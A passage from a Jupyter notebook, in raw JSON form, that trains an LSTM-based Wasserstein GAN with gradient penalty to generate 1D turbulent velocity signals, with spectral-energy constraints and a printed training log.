23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 9\nk = 8\nk = 7\nk = 7\nk = 6\nk = 6\nk = 5\nk = 5\nk = 5\nk = 6\nk = 6\nk = 7\nk = 8\nk = 9\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk 
= 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 9\nk = 8\nk = 7\nk = 6\nk = 6\nk = 5\nk = 5\nk = 4\nk = 4\nk = 5\nk = 5\nk = 6\nk = 6\nk = 7\nk = 8\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 8\nk = 7\nk = 6\nk = 6\nk = 5\nk = 5\nk = 4\nk = 3\nk = 3\nk = 4\nk = 4\nk = 5\nk = 6\nk = 7\nk = 8\nk = 9\nk = 10\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 
59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 10\nk = 9\nk = 8\nk = 7\nk = 6\nk = 5\nk = 4\nk = 4\nk = 3\nk = 2\nk = 2\nk = 3\nk = 4\nk = 5\nk = 5\nk = 6\nk = 7\nk = 8\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 8\nk = 7\nk = 6\nk = 5\nk = 5\nk = 4\nk = 3\nk = 2\nk = 1\nk = 2\nk = 2\nk = 3\nk = 4\nk = 5\nk = 6\nk = 7\nk = 8\nk = 9\nk = 10\nk = 11\nk = 12\nk = 13\nk = 14\nk = 15\nk = 16\nk = 17\nk = 18\nk = 19\nk = 20\nk = 21\nk = 22\nk = 23\nk = 24\nk = 25\nk = 26\nk = 27\nk = 28\nk = 29\nk = 30\nk = 31\nk = 32\nk = 33\nk = 34\nk = 35\nk = 36\nk = 37\nk = 38\nk = 39\nk = 40\nk = 41\nk = 42\nk = 43\nk = 44\nk = 45\nk = 46\nk = 47\nk = 48\nk = 49\nk = 50\nk = 51\nk = 52\nk = 53\nk = 54\nk = 55\nk = 56\nk = 57\nk = 58\nk = 59\nk = 60\nk = 61\nk = 62\nk = 63\nk = 64\nk = 63\nk = 62\nk = 
61\nk = 60\nk = 59\nk = 58\nk = 57\nk = 56\nk = 55\nk = 54\nk = 53\nk = 52\nk = 51\nk = 50\nk = 49\nk = 48\nk = 47\nk = 46\nk = 45\nk = 44\nk = 43\nk = 42\nk = 41\nk = 40\nk = 39\nk = 38\nk = 37\nk = 36\nk = 35\nk = 34\nk = 33\nk = 32\nk = 31\nk = 30\nk = 29\nk = 28\nk = 27\nk = 26\nk = 25\nk = 24\nk = 23\nk = 22\nk = 21\nk = 20\nk = 19\nk = 18\nk = 17\nk = 16\nk = 15\nk = 14\nk = 13\nk = 12\nk = 11\nk = 10\nk = 9\nk = 8\nk = 7\nk = 6\nk = 5\nk = 4\nk = 3\nk = 2\nk = 2\n" ], [ "plt.xscale('log')\nplt.plot(wave_numbers,tke_spectrum)", "_____no_output_____" ] ], [ [ "#Learning 1D Turbulent signal with GAN\n ", "_____no_output_____" ] ], [ [ "# Set random seem for reproducibility\nmanualSeed = 999\n#manualSeed = random.randint(1, 10000) # use if you want new results\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)", "Random Seed: 999\n" ], [ "# Batch size during training\nbatch_size = 128\n\n# Size of z latent vector (i.e. size of generator input)\nnz = 1\n\n# Number of training epochs\nnum_epochs = 40\n\n# Learning rate for optimizers\nlr = 0.0001\n\n# Beta1 hyperparam for Adam optimizers\nbeta1 = 0.0\n\n# Number of GPUs available. 
Use 0 for CPU mode.\nngpu = 1\n\nncritic = 5", "_____no_output_____" ], [ "#Create Dataset\ndataset = torch.utils.data.TensorDataset(train_sigs)\n#Create DataLoader\ndataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,\n shuffle=True)", "_____no_output_____" ], [ "# Decide which device we want to run on\ndevice = torch.device(\"cuda:0\" if (torch.cuda.is_available() and ngpu > 0) else \"cpu\")", "_____no_output_____" ], [ "# custom weights initialization called on netG and netD\ndef weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif classname.find('Conv') != -1:\n nn.init.normal_(m.weight.data, 0.0, 0.02)", "_____no_output_____" ] ], [ [ "## Generator", "_____no_output_____" ] ], [ [ "class Generator(nn.Module):\n def __init__(self,ngpu):\n super(Generator, self).__init__()\n self.ngpu = ngpu\n self.hidden_dim = 256\n self.lstm_cell = nn.LSTMCell(1+1,self.hidden_dim)\n self.fc2 = nn.Sequential(\n nn.Linear(self.hidden_dim,1,bias=False),\n )\n def init_hidden(self, batch_size):\n ''' Initialize hidden state '''\n # create NEW tensor with SAME TYPE as weight\n weight = next(self.parameters()).data\n\n if (self.ngpu >= 1):\n \n hidden = ((weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2).cuda(),\n weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2).cuda()),\n (weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2).cuda(),\n weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2).cuda()))\n\n else:\n hidden = ((weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2),\n weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2)),\n (weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2),\n weight.new(batch_size, self.hidden_dim).normal_(mean=0,std=0.2)))\n\n return hidden\n def forward(self, z, n_points):\n l_size = z.size()\n output = torch.empty((l_size[0],l_size[1],n_points)).to(device)\n for j 
in range(z.shape[1]):\n h_0 = torch.randn(l_size[0],self.hidden_dim).to(device)\n c_0 = torch.randn(l_size[0],self.hidden_dim).to(device)\n y_0 = torch.randn((l_size[0],1)).to(device)*0.2\n seq = y_0\n for i in range(n_points-1):\n noise = torch.cat((z[:,j,i].unsqueeze(1),y_0),dim=1)\n h_0, c_0 = self.lstm_cell(noise,(h_0,c_0))\n y_0 = self.fc2(h_0)\n seq = torch.cat((seq,y_0),dim=1)\n seq = torch.reshape(seq,(l_size[0],n_points))\n output[:,j,:] = seq\n return output", "_____no_output_____" ], [ "# Create the generator\nnetG = Generator(ngpu).to(device)\n\n# Handle multi-gpu if desired\nif (device.type == 'cuda') and (ngpu > 1):\n netG = nn.DataParallel(netG, list(range(ngpu)))\n\nnetG.apply(weights_init)\n\n# Print the model\nprint(netG)", "Generator(\n (lstm_cell): LSTMCell(2, 256)\n (fc2): Sequential(\n (0): Linear(in_features=256, out_features=1, bias=False)\n )\n)\n" ], [ "z = torch.randn(128,1,128,device=device)\ngen_sig = netG(z,128)\nplt.plot(gen_sig[0,0,:].cpu().detach().numpy())", "_____no_output_____" ] ], [ [ "## Discriminator", "_____no_output_____" ] ], [ [ "class Discriminator(nn.Module):\n def __init__(self, ngpu):\n super(Discriminator, self).__init__()\n self.ngpu = ngpu\n self.main = nn.Sequential(\n # input is nz x 1 x 1\n (nn.Conv2d(128, 64 * 4, (5,1), (2,1), (2,0), bias=False)),\n nn.LeakyReLU(0.2,inplace=True),\n # state size. (ndf*2) x 1 x 1\n (nn.Conv2d(64 * 4, 64 * 2, (5,1), (2,1), (2,0), bias=False)),\n nn.LeakyReLU(0.2,inplace=True),\n # state size. 
(ndf*4) x 1 x 1\n (nn.Conv2d(64 * 2, 64, (5,1), (2,1), (2,0), bias=False)),\n nn.LeakyReLU(0.2,inplace=True),\n (nn.Conv2d(64, 1, (5,1), (2,1), (2,0), bias=False)),\n \n )\n\n def forward(self, noise):\n l_size = noise.size()\n noise = torch.reshape(noise,(l_size[0],128,l_size[1],1))\n return self.main(noise)", "_____no_output_____" ], [ "# Create the Discriminator\nnetD = Discriminator(ngpu).to(device)\n\n# Handle multi-gpu if desired\nif (device.type == 'cuda') and (ngpu > 1):\n netD = nn.DataParallel(netD, list(range(ngpu)))\n\nnetD.apply(weights_init)\n\n# Print the model\nprint(netD)", "Discriminator(\n (main): Sequential(\n (0): Conv2d(128, 256, kernel_size=(5, 1), stride=(2, 1), padding=(2, 0), bias=False)\n (1): LeakyReLU(negative_slope=0.2, inplace=True)\n (2): Conv2d(256, 128, kernel_size=(5, 1), stride=(2, 1), padding=(2, 0), bias=False)\n (3): LeakyReLU(negative_slope=0.2, inplace=True)\n (4): Conv2d(128, 64, kernel_size=(5, 1), stride=(2, 1), padding=(2, 0), bias=False)\n (5): LeakyReLU(negative_slope=0.2, inplace=True)\n (6): Conv2d(64, 1, kernel_size=(5, 1), stride=(2, 1), padding=(2, 0), bias=False)\n )\n)\n" ], [ "prob = netD(train_sigs.to(device))\nprint(prob.mean())\nprint(prob)", "tensor(-0.0002, device='cuda:0', grad_fn=<MeanBackward0>)\ntensor([[[[-0.0006]]],\n\n\n [[[-0.0004]]],\n\n\n [[[-0.0003]]],\n\n\n ...,\n\n\n [[[-0.0001]]],\n\n\n [[[-0.0002]]],\n\n\n [[[-0.0003]]]], device='cuda:0', grad_fn=<CudnnConvolutionBackward>)\n" ] ], [ [ "## GAN", "_____no_output_____" ] ], [ [ "# Initialize loss function\ndef criterion(y):\n return torch.mean(y)\n# Setup Adam optimizers for both G and D\nbetas=(beta1, 0.9)\noptimizerD = optim.Adam(netD.parameters(), lr=lr,betas=betas)\noptimizerG = optim.Adam(netG.parameters(), lr=lr,betas=betas)", "_____no_output_____" ], [ "mean_real = torch.mean(train_sigs,dim=0)\ndef stat_constraint(x):\n meanx = torch.mean(x,dim=0)\n meany = mean_real.to(device)\n return torch.norm(meanx-meany)", "_____no_output_____" ], 
[ "def cov(y):\n b_size = y.shape[0]\n y = y.unsqueeze(-1)\n yt = torch.transpose(y,-2,-1)\n sigma = torch.mean(torch.matmul(y,yt),dim=0)-torch.matmul(torch.mean(y,dim=0),torch.mean(yt,dim=0))\n return sigma", "_____no_output_____" ], [ "cov(train_sigs).shape", "_____no_output_____" ], [ "def stat_constraint4(x,y):\n sigmax = (cov(x))\n sigmay = (cov(y))\n return torch.norm(sigmax-sigmay)", "_____no_output_____" ], [ "def score(x,y):\n covx = torch.mean(cov(x),dim=0)\n covy = torch.mean(cov(y),dim=0)\n term1 = torch.mean(((torch.mean(x,dim=1)-torch.mean(y,dim=1))**2)**0.5)\n term2 = torch.trace(covx+covy-2*(covx*covy)**0.5)\n return term1 + term2", "_____no_output_____" ], [ "def spec_1D(u,lx,ly,lz,smooth=False):\n nx = u.shape[1]\n ny = u.shape[2]\n nz = u.shape[3]\n\n nt = nx * ny * nz\n n = max(nx, ny, nz)\n uh = torch.rfft(u,3,onesided=False) / nt\n\n tkeh = 0.5 * (uh[:,:,:,:,0]**2+uh[:,:,:,:,1]**2)\n\n length = max(lx, ly, lz)\n\n knorm = 2.0 * np.pi / length\n\n kxmax = nx / 2\n kymax = ny / 2\n kzmax = nz / 2\n\n wave_numbers = knorm * np.arange(0, n)\n tke_spectrum = torch.zeros(u.shape[0],len(wave_numbers)).to(device)\n if nx==ny==nz :\n for kx in range(-nx//2, nx//2-1):\n for ky in range(-ny//2, ny//2-1):\n for kz in range(-nz//2, nz//2-1):\n rk = np.sqrt(kx**2 + ky**2 + kz**2)\n k = int(np.round(rk))\n tke_spectrum[:,k] += tkeh[:,kx, ky, kz]\n else:\n tke_spectrum = tkeh\n \n\n tke_spectrum = tke_spectrum / knorm\n if smooth == True:\n tke_spectrum = torch.reshape(tke_spectrum,(u.shape[0],1,n))\n window = torch.ones(1,1,5).to(device) / 5\n tkespecsmooth = nn.functional.conv1d(tke_spectrum,window,padding=2)\n tkespecsmooth[:,:,0:4] = tke_spectrum[:,:,0:4]\n tke_spectrum = tkespecsmooth\n if nx==ny==nz:\n return wave_numbers, torch.reshape(tke_spectrum,(u.shape[0],n))\n else:\n return wave_numbers, tke_spectrum", "_____no_output_____" ], [ "def spec(u,lx,smooth=True):\n n = u.shape[2]\n u = u.reshape(u.shape[0],u.shape[2])\n uh = 
torch.rfft(u,1,onesided=False)/n\n spec = 0.5 * (uh[:,:,0]**2+uh[:,:,1]**2)\n k = 2.0 * np.pi / lx\n wave_numbers = k*np.arange(0,n)\n spec[:,int(n/2+1):] = 0\n\n if smooth == True:\n spec = torch.reshape(spec,(u.shape[0],1,n))\n window = torch.ones(1,1,5).to(device) / 5\n specsmooth = nn.functional.conv1d(spec,window,padding=2)\n specsmooth[:,:,0:4] = spec[:,:,0:4]\n spec = torch.reshape(specsmooth,(u.shape[0],n))\n\n return wave_numbers, spec", "_____no_output_____" ], [ "k, E = spec(train_sigs.to(device),lx,True)\nE = torch.mean(E,dim=0)\nplt.xscale('log')\nplt.yscale('log')\nplt.plot(k,E.cpu().detach())", "_____no_output_____" ], [ "def stat_cosntraint5(x):\n k, Ex = spec(x,lx)\n return torch.norm(Ex-E)", "_____no_output_____" ], [ "stat_cosntraint5(fake)", "_____no_output_____" ], [ "uh = torch.rfft(torch.tensor(u),3,onesided=False)\ntkeh = 0.5 * (uh[:,:,:,:,0]**2+uh[:,:,:,:,1]**2)", "_____no_output_____" ], [ "def calc_gradient_penalty(netD, real_data, generated_data):\n # GP strength\n LAMBDA = 10\n\n b_size = real_data.size()[0]\n\n # Calculate interpolation\n alpha = torch.rand(b_size, nz, 128)\n alpha = alpha.expand_as(real_data)\n alpha = alpha.cuda()\n\n interpolated = alpha * real_data.data + (1 - alpha) * generated_data.data\n interpolated = torch.autograd.Variable(interpolated, requires_grad=True)\n interpolated = interpolated.cuda()\n\n # Calculate probability of interpolated examples\n prob_interpolated = netD(interpolated)\n\n # Calculate gradients of probabilities with respect to examples\n gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=interpolated,\n grad_outputs=torch.ones(prob_interpolated.size()).cuda(),\n create_graph=True, retain_graph=True)[0]\n\n # Gradients have shape (batch_size, num_channels, img_width, img_height),\n # so flatten to easily take norm per example in batch\n gradients = gradients.view(b_size, -1)\n\n # Derivatives of the gradient close to 0 can cause problems because of\n # the square root, so 
manually calculate norm and add epsilon\n gradients_norm = torch.sqrt(torch.sum(gradients ** 2, dim=1) + 1e-12)\n\n # Return gradient penalty\n return LAMBDA * ((gradients_norm - 1) ** 2).mean()", "_____no_output_____" ], [ "# Training Loop\n\n# Lists to keep track of progress\nimg_list = []\nG_losses = []\nD_losses = []\nScore = []\niters = 0\nprint(\"Starting Training Loop...\")\n# For each epoch\nfor epoch in range(num_epochs):\n # For each batch in the dataloader\n for i, data in enumerate(dataloader, start=0):\n \n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n ## Train with all-real batch\n netD.zero_grad()\n # Format batch\n real_cpu = data[0].to(device)\n b_size = real_cpu.size()\n # Forward pass real batch through D\n output = netD(real_cpu)\n # Calculate loss on all-real batch\n errD_real = criterion(output)\n D_x = errD_real.item()\n\n ## Train with all-fake batch\n # Generate batch of latent vectors\n noise = torch.randn(b_size[0], nz, 128, device=device)\n # Generate fake image batch with G\n fake = netG(noise,128)\n # Classify all fake batch with D\n output = netD(fake)\n # Calculate D's loss on the all-fake batch\n errD_fake = criterion(output)\n D_G_z1 = errD_fake.item()\n #calculate gradient penalty\n grad_penalty = calc_gradient_penalty(netD,real_cpu,fake)\n #grad_penalty = calc_gradient_penalty(netD,real_cpu,fake,class_real)\n # Add the gradients and penalty from the all-real and all-fake batches\n errD = -errD_real + errD_fake + grad_penalty\n errD.backward()\n # Update D\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n if iters % ncritic == 0:\n netG.zero_grad()\n # Since we just updated D, perform another forward pass of all-fake batch through D\n noise = torch.randn(b_size[0], nz, 128, device=device)\n fake = netG(noise,128)\n output = netD(fake)\n # Calculate G's loss based on this 
output\n errG = -criterion(output) + stat_constraint4(fake,real_cpu) + 10*stat_cosntraint5(fake)\n # Calculate gradients for G\n errG.backward()\n D_G_z2 = errG.item()\n # Update G\n optimizerG.step()\n\n FID = score(real_cpu,fake)\n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f \\t FID: %.4f'\n % (epoch, num_epochs, i, len(dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2,FID))\n \n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n Score.append(FID.item())\n iters += 1", "Starting Training Loop...\n[0/40][0/128]\tLoss_D: 9.9786\tLoss_G: 1.6009\tD(x): -0.0002\tD(G(z)): -0.0000 / 1.6009 \t FID: 6.1212\n[0/40][50/128]\tLoss_D: 8.6431\tLoss_G: 1.5536\tD(x): -0.0049\tD(G(z)): -0.0004 / 1.5536 \t FID: 5.9032\n[0/40][100/128]\tLoss_D: 3.4854\tLoss_G: 1.4953\tD(x): -0.0248\tD(G(z)): -0.0033 / 1.4953 \t FID: 5.6146\n[1/40][0/128]\tLoss_D: 0.7241\tLoss_G: 1.5667\tD(x): -0.0484\tD(G(z)): -0.0042 / 1.5667 \t FID: 5.7969\n[1/40][50/128]\tLoss_D: -0.0194\tLoss_G: 1.5520\tD(x): 0.0049\tD(G(z)): -0.0308 / 1.5520 \t FID: 5.2629\n[1/40][100/128]\tLoss_D: 0.0007\tLoss_G: 1.5270\tD(x): 0.0562\tD(G(z)): 0.0169 / 1.5270 \t FID: 5.0435\n[2/40][0/128]\tLoss_D: -0.0033\tLoss_G: 1.5706\tD(x): 0.0704\tD(G(z)): 0.0163 / 1.5706 \t FID: 5.1384\n[2/40][50/128]\tLoss_D: -0.0204\tLoss_G: 1.6086\tD(x): 0.0567\tD(G(z)): -0.0372 / 1.6086 \t FID: 4.7286\n[2/40][100/128]\tLoss_D: 0.0942\tLoss_G: 1.6262\tD(x): 0.1388\tD(G(z)): 0.0344 / 1.6262 \t FID: 4.7446\n[3/40][0/128]\tLoss_D: 0.0746\tLoss_G: 1.3920\tD(x): 0.1745\tD(G(z)): 0.0549 / 1.3920 \t FID: 4.1156\n[3/40][50/128]\tLoss_D: 0.3216\tLoss_G: 1.4250\tD(x): 0.1916\tD(G(z)): 0.0019 / 1.4250 \t FID: 3.6693\n[3/40][100/128]\tLoss_D: 0.4263\tLoss_G: 1.3742\tD(x): 0.2367\tD(G(z)): 0.0738 / 1.3742 \t FID: 3.1086\n[4/40][0/128]\tLoss_D: 0.6053\tLoss_G: 1.1507\tD(x): 0.2429\tD(G(z)): 0.0922 / 1.1507 \t FID: 
2.2444\n[4/40][50/128]\tLoss_D: 0.6051\tLoss_G: 1.0808\tD(x): 0.3566\tD(G(z)): 0.1513 / 1.0808 \t FID: 1.3108\n[4/40][100/128]\tLoss_D: 0.6510\tLoss_G: 0.9687\tD(x): 0.3900\tD(G(z)): 0.1538 / 0.9687 \t FID: 1.2151\n[5/40][0/128]\tLoss_D: 0.4432\tLoss_G: 1.0073\tD(x): 0.3716\tD(G(z)): 0.1700 / 1.0073 \t FID: 1.1721\n[5/40][50/128]\tLoss_D: 1.4735\tLoss_G: 0.8815\tD(x): 0.3622\tD(G(z)): 0.1842 / 0.8815 \t FID: 0.8050\n[5/40][100/128]\tLoss_D: 0.9238\tLoss_G: 0.9435\tD(x): 0.3935\tD(G(z)): 0.2083 / 0.9435 \t FID: 0.8198\n[6/40][0/128]\tLoss_D: 1.1221\tLoss_G: 0.7395\tD(x): 0.3461\tD(G(z)): 0.1719 / 0.7395 \t FID: 0.6274\n[6/40][50/128]\tLoss_D: 0.8005\tLoss_G: 0.8168\tD(x): 0.3981\tD(G(z)): 0.2201 / 0.8168 \t FID: 0.5764\n[6/40][100/128]\tLoss_D: 0.8762\tLoss_G: 0.8213\tD(x): 0.3989\tD(G(z)): 0.1957 / 0.8213 \t FID: 0.4794\n[7/40][0/128]\tLoss_D: 1.0190\tLoss_G: 0.7536\tD(x): 0.4766\tD(G(z)): 0.2724 / 0.7536 \t FID: 0.4503\n[7/40][50/128]\tLoss_D: 0.5222\tLoss_G: 0.7774\tD(x): 0.4810\tD(G(z)): 0.2703 / 0.7774 \t FID: 0.4584\n[7/40][100/128]\tLoss_D: 0.3487\tLoss_G: 0.8194\tD(x): 0.5614\tD(G(z)): 0.2524 / 0.8194 \t FID: 0.6017\n[8/40][0/128]\tLoss_D: 0.1153\tLoss_G: 0.8014\tD(x): 0.5452\tD(G(z)): 0.2933 / 0.8014 \t FID: 0.4927\n[8/40][50/128]\tLoss_D: 0.0449\tLoss_G: 0.6338\tD(x): 0.5917\tD(G(z)): 0.3483 / 0.6338 \t FID: 0.5059\n[8/40][100/128]\tLoss_D: 0.1015\tLoss_G: 0.6537\tD(x): 0.6297\tD(G(z)): 0.3271 / 0.6537 \t FID: 0.4809\n[9/40][0/128]\tLoss_D: 0.1523\tLoss_G: 0.7114\tD(x): 0.6286\tD(G(z)): 0.3507 / 0.7114 \t FID: 0.5633\n[9/40][50/128]\tLoss_D: 0.0708\tLoss_G: 0.6489\tD(x): 0.7506\tD(G(z)): 0.4712 / 0.6489 \t FID: 0.4593\n[9/40][100/128]\tLoss_D: -0.0355\tLoss_G: 0.5998\tD(x): 0.7902\tD(G(z)): 0.5447 / 0.5998 \t FID: 0.5604\n[10/40][0/128]\tLoss_D: -0.0967\tLoss_G: 0.5312\tD(x): 0.8006\tD(G(z)): 0.5573 / 0.5312 \t FID: 0.4877\n[10/40][50/128]\tLoss_D: -0.0603\tLoss_G: 0.5791\tD(x): 0.8260\tD(G(z)): 0.5773 / 0.5791 \t FID: 0.4415\n[10/40][100/128]\tLoss_D: 
-0.1302\tLoss_G: 0.5084\tD(x): 0.8147\tD(G(z)): 0.5453 / 0.5084 \t FID: 0.4061\n[11/40][0/128]\tLoss_D: -0.2422\tLoss_G: 0.6101\tD(x): 0.9320\tD(G(z)): 0.5183 / 0.6101 \t FID: 0.4600\n[11/40][50/128]\tLoss_D: -0.2331\tLoss_G: 0.5419\tD(x): 0.9069\tD(G(z)): 0.6064 / 0.5419 \t FID: 0.4472\n[11/40][100/128]\tLoss_D: -0.2591\tLoss_G: 0.4023\tD(x): 0.8977\tD(G(z)): 0.5746 / 0.4023 \t FID: 0.3815\n[12/40][0/128]\tLoss_D: -0.2746\tLoss_G: 0.3862\tD(x): 1.0285\tD(G(z)): 0.6337 / 0.3862 \t FID: 0.4764\n[12/40][50/128]\tLoss_D: -0.3574\tLoss_G: 0.4552\tD(x): 1.0287\tD(G(z)): 0.6238 / 0.4552 \t FID: 0.4153\n[12/40][100/128]\tLoss_D: -0.3097\tLoss_G: 0.3914\tD(x): 1.0223\tD(G(z)): 0.6520 / 0.3914 \t FID: 0.4265\n[13/40][0/128]\tLoss_D: -0.3733\tLoss_G: 0.3664\tD(x): 1.0295\tD(G(z)): 0.6056 / 0.3664 \t FID: 0.3554\n[13/40][50/128]\tLoss_D: -0.3047\tLoss_G: 0.4480\tD(x): 1.0025\tD(G(z)): 0.6346 / 0.4480 \t FID: 0.3594\n[13/40][100/128]\tLoss_D: -0.4185\tLoss_G: 0.4438\tD(x): 1.1371\tD(G(z)): 0.6611 / 0.4438 \t FID: 0.4062\n[14/40][0/128]\tLoss_D: -0.2403\tLoss_G: 0.3337\tD(x): 1.0012\tD(G(z)): 0.7096 / 0.3337 \t FID: 0.3510\n[14/40][50/128]\tLoss_D: -0.3973\tLoss_G: 0.3705\tD(x): 1.0915\tD(G(z)): 0.6344 / 0.3705 \t FID: 0.3951\n[14/40][100/128]\tLoss_D: -0.3664\tLoss_G: 0.4086\tD(x): 1.1507\tD(G(z)): 0.7449 / 0.4086 \t FID: 0.3835\n[15/40][0/128]\tLoss_D: -0.3213\tLoss_G: 0.2880\tD(x): 1.0917\tD(G(z)): 0.7400 / 0.2880 \t FID: 0.3220\n[15/40][50/128]\tLoss_D: -0.4715\tLoss_G: 0.4758\tD(x): 1.2225\tD(G(z)): 0.7136 / 0.4758 \t FID: 0.3879\n[15/40][100/128]\tLoss_D: -0.3500\tLoss_G: 0.3982\tD(x): 1.0949\tD(G(z)): 0.6939 / 0.3982 \t FID: 0.3790\n[16/40][0/128]\tLoss_D: -0.2828\tLoss_G: 0.3937\tD(x): 1.1140\tD(G(z)): 0.7080 / 0.3937 \t FID: 0.3820\n[16/40][50/128]\tLoss_D: -0.3594\tLoss_G: 0.3269\tD(x): 1.1503\tD(G(z)): 0.7533 / 0.3269 \t FID: 0.3747\n[16/40][100/128]\tLoss_D: -0.3738\tLoss_G: 0.3470\tD(x): 1.1374\tD(G(z)): 0.7305 / 0.3470 \t FID: 0.3501\n[17/40][0/128]\tLoss_D: 
